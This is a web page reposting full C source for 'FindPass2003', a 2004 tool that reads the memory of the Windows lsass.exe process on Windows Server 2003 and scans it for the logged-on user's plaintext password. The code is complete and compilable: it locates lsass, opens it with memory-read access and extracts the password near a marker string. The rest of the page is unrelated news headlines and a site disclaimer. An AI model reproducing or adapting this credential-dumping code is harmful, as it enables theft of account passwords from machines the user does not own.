分享
 
 
 

FindPass2003 Source

王朝other·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

//********************************************************************************

// Version: V1.0

// Coder: WinEggDrop

// Date Release: 12/15/2004

// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method

// Used Is Pretty Unwise,But This May Be The Only Way To Review The

// Logon User's Password On Windows 2003.

// Test PlatForm: Windows 2003

// Compiled On: VC++ 6.0

//********************************************************************************

#include <stdio.h>

#include <windows.h>

#include <tlhelp32.h>

#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

char Password[MAX_PATH] = {0}; // Store The Found Password

// Function ProtoType Declaration

//------------------------------------------------------------------------------------------------------

BOOL FindPassword(DWORD PID);

int Search(char *Buffer,const UINT nSize);

DWORD GetLsassPID();

BOOL Is2003();

//------------------------------------------------------------------------------------------------------

// End Of Fucntion ProtoType Declaration

int main()

{

DWORD PID = 0;

printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

if (!Is2003()) // Check Out If The Box Is 2003

{

printf("The Program Can't Only Run On Windows 2003 Platform\n");

return -1;

}

PID = GetLsassPID(); // Get The Lsass.exe PID

if (PID == 0) // Fail To Get PID If Returning Zerom

{

return -1;

}

FindPassword(PID); // Find The Password From Lsass.exe Memory

return 0;

}

// End main()

//------------------------------------------------------------------------------------

// Purpose: Search The Memory & Try To Get The Password

// Return Type: int

// Parameters:

// In: char *Buffer --> The Memory Buffer To Search

// Out: const UINT nSize --> The Size Of The Memory Buffer

// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",

// Since The Password Is Near The Above Location,But It's Not Always True That

// We Will Find The Magic String,Or Even We Find It,The Password May Be Located

// At Some Other Place.We Only Look For Luck

//------------------------------------------------------------------------------------

int Search(char *Buffer,const UINT nSize)

{

UINT OffSet = 0;

UINT i = 0;

UINT j = 0 ;

UINT Count = 0;

if (Buffer == NULL)

{

return -1;

}

for (i = 0 ; i < nSize ; i++)

{

/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word

Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate

The Magic String,We Have To Do It Manually And Slowly

*/

if (Buffer[i] == 'L')

{

OffSet = 0;

if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)

{

OffSet += strlen("LocalSystem") + 1;

if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)

{

OffSet += strlen("Remote") + 1;

if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)

{

OffSet += strlen("Procedure") + 1;

if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)

{

i += OffSet;

break;

}

}

}

}

}

}

if (i < nSize)

{

ZeroMemory(Password,sizeof(Password));

for (; i < nSize ; i++)

{

if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)

{

/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In

That Way

*/

j = i + 7;

for (; j < nSize; j += 2)

{

if (Buffer[j] > 0)

{

Password[Count++] = Buffer[j];

}

else

{

break;

}

}

return i + 7; // One Flag To Indicate We Find The Password

}

}

}

return -1; // Well,We Fail To Find The Password,And This Always Happens

}

// End Search

//------------------------------------------------------------------------------------

// Purpose: To Get The Lsass.exe PID

// Return Type: DWORD

// Parameters: None

//------------------------------------------------------------------------------------

DWORD GetLsassPID()

{

HANDLE hProcessSnap;

HANDLE hProcess = NULL;

PROCESSENTRY32 pe32;

DWORD PID = 0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if( hProcessSnap == INVALID_HANDLE_VALUE )

{

printf("Fail To Create Snap Shot\n");

return 0;

}

pe32.dwSize = sizeof(PROCESSENTRY32);

if( !Process32First(hProcessSnap, &pe32))

{

CloseHandle(hProcessSnap); // Must clean up the snapshot object!

return 0;

}

do

{

if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)

{

PID = pe32.th32ProcessID;

break;

}

}while(Process32Next( hProcessSnap, &pe32));

CloseHandle( hProcessSnap);

return PID;

}

// End GetLsassPID()

//------------------------------------------------------------------------------------

// Purpose: To Find The Password

// Return Type: BOOLEAN

// Parameters:

// In: DWORD PID -> The Lsass.exe's PID

//------------------------------------------------------------------------------------

BOOL FindPassword(DWORD PID)

{

HANDLE hProcess = NULL;

char Buffer[5 * 1024] = {0};

DWORD ByteGet = 0;

int Found = -1;

hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process

if (hProcess == NULL)

{

printf("Fail To Open Process\n");

return FALSE;

}

if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe

{

printf("Fail To Read Memory\n");

CloseHandle(hProcess);

return FALSE;

}

CloseHandle(hProcess);

Found = Search(Buffer,ByteGet); // Search The Password

if (Found >= 0) // We May Find The Password

{

if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not

{

printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password);

}

}

else

{

printf("Fail To Find The Password\n");

}

return TRUE;

}

// End FindPassword

//------------------------------------------------------------------------------------

// Purpose: Check If The Box Is Windows 2003

// Return Type: BOOLEAN

// Parameters: None

//------------------------------------------------------------------------------------

BOOL Is2003()

{

OSVERSIONINFOEX osvi;

BOOL b0sVersionInfoEx;

ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));

osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))

{

osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);

}

return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);

}

// End Is2003()

// End Of File

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有